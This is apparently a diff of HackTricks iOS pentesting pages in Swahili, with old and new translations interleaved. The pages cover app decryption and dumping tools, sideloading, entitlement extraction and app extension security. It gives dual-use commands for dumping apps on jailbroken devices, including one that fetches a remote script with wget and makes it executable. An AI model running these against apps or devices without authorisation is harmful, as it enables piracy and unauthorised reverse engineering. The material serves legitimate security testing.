**Kukamilisha Ufichuzi:** Badilisha metadata ya faili ya binary ili kuonyesha kutokuwepo kwa ufichuzi kwa kutumia zana kama **MachOView**, kwa kuweka `cryptid` kuwa 0.
**Kumaliza Kufichua:** Badilisha metadata ya binary ili kuonyesha kutokuwepo kwa usimbuaji kwa kutumia zana kama **MachOView**, ukipanga `cryptid` kuwa 0.
### **Ufichuzi (Kiotomatiki)**
### **Kufichua (Kiotomatiki)**
#### **frida-ios-dump**
Zana ya [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) hutumiwa kwa **ufichuzi na uchimbaji wa kiotomatiki wa programu** kutoka kwenye vifaa vya iOS. Kwanza, mtu lazima aconfigure `dump.py` ili kuunganisha kifaa cha iOS, ambacho kinaweza kufanywa kupitia localhost kwenye bandari 2222 kupitia **iproxy** au moja kwa moja kupitia anwani ya IP ya kifaa na bandari.
Zana ya [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) inatumika kwa **kufichua na kutoa programu kiotomatiki** kutoka kwa vifaa vya iOS. Kwanza, mtu anapaswa kuunda `dump.py` kuungana na kifaa cha iOS, ambayo inaweza kufanywa kupitia localhost kwenye bandari 2222 kupitia **iproxy** au moja kwa moja kupitia anwani ya IP ya kifaa na bandari.
Programu zilizosakinishwa kwenye kifaa zinaweza kuorodheshwa kwa kutumia amri:
Programu zilizowekwa kwenye kifaa zinaweza kuorodheshwa kwa amri:
```bash
$ python dump.py -l
```
Kutapanya programu maalum, kama vile Telegram, tumia amri ifuatayo:
Ili kudump programu maalum, kama Telegram, amri ifuatayo inatumika:
```bash
$ python3 dump.py -u "root" -p "<PASSWORD>" ph.telegra.Telegraph
```
Amri hii inaanzisha upakuaji wa programu, ikisababisha uundaji wa faili ya `Telegram.ipa` katika saraka ya sasa. Mchakato huu ni mzuri kwa vifaa vilivyofungwa, kwani programu zisizo na saini au zilizosainiwa bandia zinaweza kusakinishwa tena kwa kutumia zana kama [**ios-deploy**](https://github.com/ios-control/ios-deploy).
Hii amri inaanzisha upakuaji wa programu, na kusababisha kuundwa kwa faili ya `Telegram.ipa` katika saraka ya sasa. Mchakato huu unafaa kwa vifaa vilivyovunjwa, kwani programu zisizosainiwa au zisizo sahihi zinaweza kufungwa upya kwa kutumia zana kama [**ios-deploy**](https://github.com/ios-control/ios-deploy).
#### **flexdecrypt**
Zana ya [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt), pamoja na kifuniko chake [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), inaruhusu uchimbaji wa faili za IPA kutoka kwenye programu zilizosakinishwa. Amri za usakinishaji kwa **flexdecrypt** kwenye kifaa ni pamoja na kupakua na kusakinisha pakiti ya `.deb`. **flexdump** inaweza kutumika kuorodhesha na kudump programu, kama inavyoonyeshwa katika amri zifuatazo:
Zana ya [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt), pamoja na kifungashio chake [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), inaruhusu kutoa faili za IPA kutoka kwa programu zilizowekwa. Amri za usakinishaji za **flexdecrypt** kwenye kifaa zinajumuisha kupakua na kusakinisha kifurushi cha `.deb`. **flexdump** inaweza kutumika kuorodhesha na kupakua programu, kama inavyoonyeshwa katika amri zilizo hapa chini:
```bash
apt install zip unzip
wget https://gist.githubusercontent.com/defparam/71d67ee738341559c35c684d659d40ac/raw/30c7612262f1faf7871ba8e32fbe29c0f3ef9e27/flexdump -P /usr/local/bin; chmod +x /usr/local/bin/flexdump
@ -141,33 +142,33 @@ flexdump list
flexdump dump Twitter.app
```
#### **bagbak**
[**bagbak**](https://github.com/ChiChou/bagbak), chombo kingine kinachotegemea Frida, kinahitaji kifaa kilichofungwa kwa ajili ya kufichua programu:
[**bagbak**](https://github.com/ChiChou/bagbak), chombo kingine kinachotumia Frida, kinahitaji kifaa kilichovunjwa ili kufungua programu:
```bash
bagbak --raw Chrome
```
#### **r2flutch**
**r2flutch**, ikitumia radare na frida, inatumika kwa kusimbua na kudumpa programu. Maelezo zaidi yanaweza kupatikana kwenye [**ukurasa wake wa GitHub**](https://github.com/as0ler/r2flutch).
**r2flutch**, ikitumia radare na frida, inatumika kwa ajili ya ufichuzi wa programu na dumping. Taarifa zaidi zinaweza kupatikana kwenye [**GitHub page**](https://github.com/as0ler/r2flutch).
### **Kuweka Programu**
**Sideloading** inahusu kuweka programu nje ya Duka rasmi la App. Mchakato huu unashughulikiwa na **installd daemon** na inahitaji programu kuwa na saini ya cheti kilichotolewa na Apple. Vifaa vilivyofanyiwa jailbreak vinaweza kuepuka hii kupitia **AppSync**, kuruhusu kuweka pakiti za IPA zenye saini bandia.
**Sideloading** inamaanisha kufunga programu nje ya Duka rasmi la Programu. Mchakato huu unashughulikiwa na **installd daemon** na unahitaji programu zisainiwe kwa cheti kilichotolewa na Apple. Vifaa vilivyofanywa jailbroken vinaweza kupita hili kupitia **AppSync**, kuruhusu ufungaji wa pakiti za IPA zenye sahihi bandia.
#### **Vyombo vya Sideloading**
#### **Zana za Sideloading**
- **Cydia Impactor**: Chombo cha kusaini na kuweka faili za IPA kwenye iOS na faili za APK kwenye Android. Mwongozo na suluhisho la matatizo yanaweza kupatikana kwenye [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/).
- **Cydia Impactor**: Zana ya kusaini na kufunga faili za IPA kwenye iOS na faili za APK kwenye Android. Miongozo na ufumbuzi wa matatizo yanaweza kupatikana kwenye [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/).
- **libimobiledevice**: Maktaba kwa Linux na macOS kwa mawasiliano na vifaa vya iOS. Amri za kuweka na mifano ya matumizi ya ideviceinstaller zinapatikana kwa kuweka programu kupitia USB.
- **libimobiledevice**: Maktaba kwa ajili ya Linux na macOS kuwasiliana na vifaa vya iOS. Amri za ufungaji na mifano ya matumizi ya ideviceinstaller zinatolewa kwa ajili ya kufunga programu kupitia USB.
- **ipainstaller**: Chombo cha amri kinachoruhusu kuweka programu moja kwa moja kwenye vifaa vya iOS.
- **ipainstaller**: Zana hii ya mstari wa amri inaruhusu ufungaji wa moja kwa moja wa programu kwenye vifaa vya iOS.
- **ios-deploy**: Kwa watumiaji wa macOS, ios-deploy inaweka programu za iOS kupitia amri ya mstari wa peruzi. Kufungua faili ya IPA na kutumia bendera ya `-m` kwa uzinduzi wa moja kwa moja wa programu ni sehemu ya mchakato.
- **ios-deploy**: Kwa watumiaji wa macOS, ios-deploy inafunga programu za iOS kutoka kwenye mstari wa amri. Kufungua IPA na kutumia lipo `-m` kwa ajili ya uzinduzi wa moja kwa moja wa programu ni sehemu ya mchakato.
- **Xcode**: Tumia Xcode kuweka programu kwa kwenda kwenye **Window/Devices and Simulators** na kuongeza programu kwenye **Installed Apps**.
- **Xcode**: Tumia Xcode kufunga programu kwa kuingia kwenye **Window/Devices and Simulators** na kuongeza programu kwenye **Installed Apps**.
#### **Ruhusu Kuweka Programu kwenye Vifaa Visivyo vya iPad**
Ili kuweka programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thamani ya **UIDeviceFamily** kwenye faili ya **Info.plist** inahitaji kubadilishwa kuwa **1**. Mabadiliko haya, hata hivyo, yanahitaji kusaini upya faili ya IPA kutokana na ukaguzi wa uthibitisho wa saini.
#### **Ruhusu Ufunguzi wa Programu kwenye Vifaa Visivyo vya iPad**
Ili kufunga programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thamani ya **UIDeviceFamily** katika faili ya **Info.plist** inahitaji kubadilishwa kuwa **1**. Marekebisho haya, hata hivyo, yanahitaji kusaini tena faili ya IPA kutokana na ukaguzi wa uthibitisho wa sahihi.
**Note**: Njia hii inaweza kushindwa ikiwa programu inahitaji uwezo maalum unaopatikana kwenye mifano mipya ya iPad wakati inatumia iPhone au iPod touch ya zamani.
**Kumbuka**: Njia hii inaweza kushindwa ikiwa programu inahitaji uwezo wa kipekee kwa mifano mipya ya iPad wakati ikitumia iPhone au iPod touch ya zamani.
@ -178,16 +179,17 @@ Ili kuweka programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thaman
* [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/)
* [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0056/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0056/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

56
mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
View file

@ -1,31 +1,32 @@
# Kuchimbua Haki za Matumizi kutoka kwa Programu Iliyokompiliwa
# Extracting Entitlements from Compiled Application
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Muhtasari wa ukurasa [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary)
### **Kuchimbua Haki za Matumizi na Faili za Uthibitisho wa Simu**
### **Extracting Entitlements and Mobile Provision Files**
Wakati unashughulika na IPA ya programu au programu iliyosanikishwa kwenye kifaa kilichovunjwa, huenda usiweze kupata faili za `.entitlements` au faili ya `embedded.mobileprovision` moja kwa moja. Walakini, orodha za haki za matumizi bado zinaweza kuchimbwa kutoka kwa programu iliyokompiliwa, kwa kufuata taratibu zilizoainishwa katika sura ya "Uchunguzi wa Usalama wa Msingi wa iOS", haswa sehemu ya "Kupata Programu Iliyokompiliwa".
Wakati wa kushughulikia IPA ya programu au programu iliyosanikishwa kwenye kifaa kilichovunjwa, kupata faili za `.entitlements` au faili ya `embedded.mobileprovision` moja kwa moja huenda isiwezekane. Hata hivyo, orodha za mali za entitlements bado zinaweza kutolewa kutoka kwa binary ya programu, kufuata taratibu zilizoelezwa katika sura ya "iOS Basic Security Testing", hasa sehemu ya "Acquiring the App Binary".
Hata na programu iliyofichwa, hatua fulani zinaweza kutumika kuchimbua faili hizi. Ikiwa hatua hizi zinashindwa, zana kama Clutch (ikiwa inalingana na toleo la iOS), frida-ios-dump, au zana kama hizo zinaweza kuhitajika kufuta na kuchimbua programu.
Hata na binaries zilizofichwa, hatua fulani zinaweza kutumika kutoa faili hizi. Ikiwa hatua hizi zitashindwa, zana kama Clutch (ikiwa inafaa na toleo la iOS), frida-ios-dump, au zana zinazofanana zinaweza kuhitajika kufichua na kutoa programu.
#### **Kuchimbua Plist ya Haki za Matumizi kutoka kwa Programu Iliyokompiliwa**
#### **Extracting the Entitlements Plist from the App Binary**
Ukiwa na programu iliyokompiliwa inayopatikana kwenye kompyuta, **binwalk** inaweza kutumika kuchimbua faili zote za XML. Amri ifuatayo inaonyesha jinsi ya kufanya hivyo:
Ikiwa binary ya programu inapatikana kwenye kompyuta, **binwalk** inaweza kutumika kutoa faili zote za XML. Amri hapa chini inaonyesha jinsi ya kufanya hivyo:
```bash
$ binwalk -e -y=xml ./Telegram\ X
@ -34,33 +35,34 @@ DECIMAL HEXADECIMAL DESCRIPTION
1430180 0x15D2A4 XML document, version: "1.0"
1458814 0x16427E XML document, version: "1.0"
```
Badala yake, **radare2** inaweza kutumika kwa kimya kimya kutekeleza amri na kumaliza, kutafuta maneno yote katika faili ya programu ambayo ina "PropertyList":
Mbadala, **radare2** inaweza kutumika kutekeleza amri kwa kimya na kutoka, ikitafuta nyuzi zote katika binary ya programu zinazohusisha "PropertyList":
```bash
$ r2 -qc 'izz~PropertyList' ./Telegram\ X
0x0015d2a4 ascii <?xml version="1.0" encoding="UTF-8" standalone="yes"?>...
0x0016427d ascii H<?xml version="1.0" encoding="UTF-8"?>...
```
Wote njia, binwalk na radare2, huwezesha uchimbaji wa faili za `plist`, na ukaguzi wa ya kwanza (0x0015d2a4) unaonyesha kupona kwa mafanikio ya [faili ya awali ya haki za Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements).
Mifumo yote miwili, binwalk na radare2, inaruhusu utoaji wa `plist` faili, huku ukaguzi wa wa kwanza (0x0015d2a4) ukionyesha urejeleaji wa mafanikio wa [faili ya awali ya entitlements kutoka Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements).
Kwa faili za programu zinazopatikana kwenye vifaa vilivyovunjwa (kwa mfano, kupitia SSH), amri ya **grep** na bendera ya `-a, --text` inaweza kutumika kutibu faili zote kama maandishi ya ASCII:
Kwa programu za binary zinazofikiwa kwenye vifaa vilivyovunjwa (kwa mfano, kupitia SSH), amri ya **grep** yenye lippu `-a, --text` inaweza kutumika kutibu faili zote kama maandiko ya ASCII:
```bash
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/...
```
Kurekebisha bendera ya `-A num, --after-context=num` inaruhusu kuonyesha mistari zaidi au chache. Njia hii ni inafaa hata kwa programu za binary zilizofichwa na imehakikiwa kwa programu kadhaa za Duka la App. Zana zilizotajwa hapo awali pia zinaweza kutumika kwenye vifaa vya iOS vilivyofungwa kwa madhumuni kama hayo.
Adjusting the `-A num, --after-context=num` flag allows for the display of more or fewer lines. Hii mbinu inapatikana hata kwa binaries za programu zilizofichwa na imethibitishwa dhidi ya programu nyingi za App Store. Zana zilizotajwa hapo awali zinaweza pia kutumika kwenye vifaa vya iOS vilivyovunjwa kwa madhumuni sawa.
**Note**: Matumizi moja kwa moja ya amri ya `strings` hayapendekeziwi kwa kazi hii kutokana na vikwazo vyake katika kupata habari muhimu. Badala yake, ni vyema kutumia grep na bendera ya `-a` kwenye binary au kutumia radare2 (`izz`)/rabin2 (`-zz`) kwa matokeo yenye ufanisi zaidi.
**Note**: Matumizi ya moja kwa moja ya amri `strings` hayapendekezwi kwa kazi hii kutokana na mipaka yake katika kupata habari muhimu. Badala yake, kutumia grep na bendera `-a` kwenye binary au kutumia radare2 (`izz`)/rabin2 (`-zz`) inashauriwa kwa matokeo bora zaidi.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

86
mobile-pentesting/ios-pentesting/ios-app-extensions.md
View file

@ -1,57 +1,79 @@
# Vipengele vya Programu za iOS
# iOS App Extensions
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Vipengele vya programu huongeza utendaji wa programu kwa kuwaruhusu kuingiliana na programu nyingine au mfumo, kutoa huduma au maudhui ya kipekee. Vipengele hivi ni pamoja na:
App extensions huongeza kazi za programu kwa kuruhusu kuingiliana na programu nyingine au mfumo, kutoa vipengele au maudhui maalum. Extensions hizi zinajumuisha:
- **Kibodi Maalum**: Inatoa kibodi ya kipekee kwenye programu zote, ikichukua nafasi ya kibodi ya iOS ya msingi.
- **Shiriki**: Inawezesha kushiriki kwenye mitandao ya kijamii au na wengine moja kwa moja.
- **Leo (Vidude)**: Inatoa maudhui au kutekeleza kazi haraka kutoka kwenye Tazama ya Kituo cha Arifa.
- **Custom Keyboard**: Inatoa kibodi ya kipekee katika programu zote, ikibadilisha kibodi ya kawaida ya iOS.
- **Share**: Inaruhusu kushiriki kwenye mitandao ya kijamii au na wengine moja kwa moja.
- **Today (Widgets)**: Inatoa maudhui au inatekeleza kazi haraka kutoka kwa mtazamo wa Leo wa Kituo cha Arifa.
Wakati mtumiaji anashirikiana na vipengele hivi, kama vile kushiriki maandishi kutoka kwenye programu mwenyeji, kipengele hicho kinaprocessinga kuingia huko ndani ya muktadha wake, kwa kutumia habari iliyoshirikiwa kutekeleza kazi yake, kama ilivyoelezwa katika nyaraka za Apple.
Wakati mtumiaji anaposhiriki na extensions hizi, kama vile kushiriki maandiko kutoka kwa programu mwenyeji, extension inashughulikia ingizo hili ndani ya muktadha wake, ikitumia taarifa zilizoshirikiwa ili kutekeleza kazi yake, kama ilivyoelezwa katika nyaraka za Apple.
### **Mambo ya Kuzingatia kuhusu Usalama**
### **Security Considerations**
Mambo muhimu ya usalama ni pamoja na:
- Vipengele na programu zinazowahifadhi huchangamana kupitia mawasiliano ya kati ya michakato, sio moja kwa moja.
- **Kifaa cha leo** ni kipekee kwa kuwa kinaweza kuomba programu yake ifunguliwe kupitia njia maalum.
- Upatikanaji wa data ulioshirikiwa unaruhusiwa ndani ya chombo cha kibinafsi, lakini upatikanaji wa moja kwa moja umepunguzwa.
- APIs fulani, pamoja na HealthKit, haziruhusiwi kwa vipengele vya programu, ambavyo pia haviruhusiwi kuanza kazi ndefu, kupata kamera, au kipaza sauti, isipokuwa kwa vipengele vya iMessage.
- Extensions na programu zinazozishikilia zinawasiliana kupitia mawasiliano ya kati ya mchakato, si moja kwa moja.
- **Today widget** ni ya kipekee kwa kuwa inaweza kuomba programu yake kufunguliwa kupitia njia maalum.
- Upatikanaji wa data iliyoshirikiwa unaruhusiwa ndani ya kontena binafsi, lakini upatikanaji wa moja kwa moja umepigwa marufuku.
- API fulani, ikiwa ni pamoja na HealthKit, haziruhusiwi kwa extensions za programu, ambazo pia cannot kuanzisha kazi zinazodumu kwa muda mrefu, kufikia kamera, au kipaza sauti, isipokuwa kwa extensions za iMessage.
### Uchambuzi Statisa
### Static Analysis
#### **Kutambua Vipengele vya Programu**
#### **Identifying App Extensions**
Ili kupata vipengele vya programu katika msimbo wa chanzo, tafuta `NSExtensionPointIdentifier` kwenye Xcode au angalia mfuko wa programu kwa faili za `.appex` zinazoonyesha vipengele. Bila msimbo wa chanzo, tumia grep au SSH kuona vitambulisho hivi ndani ya mfuko wa programu.
Ili kupata extensions za programu katika msimbo wa chanzo, tafuta `NSExtensionPointIdentifier` katika Xcode au angalia kifurushi cha programu kwa faili za `.appex` zinazoashiria extensions. Bila msimbo wa chanzo, tumia grep au SSH kutafuta vitambulisho hivi ndani ya kifurushi cha programu.
#### **Aina za Data Zinazoungwa mkono**
#### **Supported Data Types**
Angalia faili ya `Info.plist` ya kipengele cha programu ili kutambua aina za data zinazoungwa mkono na `NSExtensionActivationRule`. Hii inahakikisha kuwa ni aina za data zinazolingana tu zinazosababisha kipengele kwenye programu mwenyeji.
Angalia faili ya `Info.plist` ya extension kwa `NSExtensionActivationRule` ili kubaini aina za data zinazoungwa mkono. Mpangilio huu unahakikisha kuwa aina za data zinazofaa pekee ndizo zinazochochea extension katika programu mwenyeji.
#### **Kushiriki Data**
#### **Data Sharing**
Kushiriki data kati ya programu na kipengele chake kunahitaji chombo cha kushiriki, kilichowekwa kupitia "Vikundi vya Programu" na kupatikana kupitia `NSUserDefaults`. Nafasi hii iliyoshirikiwa ni muhimu kwa uhamishaji wa nyuma ulioanzishwa na vipengele.
Kushiriki data kati ya programu na extension yake kunahitaji kontena lililoshirikiwa, lililowekwa kupitia "App Groups" na kufikiwa kupitia `NSUserDefaults`. Nafasi hii iliyoshirikiwa ni muhimu kwa uhamishaji wa nyuma unaoanzishwa na extensions.
#### **Kuweka Vizuizi kwa Vipengele**
#### **Restricting Extensions**
Programu zinaweza kuweka vizuizi kwa aina fulani za vipengele, haswa kibodi maalum, kuhakikisha kuwa utunzaji wa data nyeti unalingana na itifaki za usalama.
Programu zinaweza kupunguza aina fulani za extensions, hasa kibodi maalum, kuhakikisha usimamizi wa data nyeti unakidhi itifaki za usalama.
### Uchambuzi wa Kudumu
### Dynamic Analysis
Uchambuzi wa kudumu unajumuisha:
Uchambuzi wa dynamic unahusisha:
- **Kuchunguza Vitu Vilivyoshiriki**: Unganisha kwenye `NSExtensionContext - inputItems` ili kuona aina za data zilizoshirikiwa na asili yake.
- **Kutambua Vipengele**: Gund
- **Inspecting Shared Items**: Hook katika `NSExtensionContext - inputItems` ili kuona aina za data zilizoshirikiwa na asili.
- **Identifying Extensions**: Gundua ni extensions zipi zinazosindika data yako kwa kuangalia mifumo ya ndani, kama vile `NSXPCConnection`.
Zana kama `frida-trace` zinaweza kusaidia katika kuelewa michakato ya msingi, hasa kwa wale wanaovutiwa na maelezo ya kiufundi ya mawasiliano ya kati ya mchakato.
## References
* [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/)
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
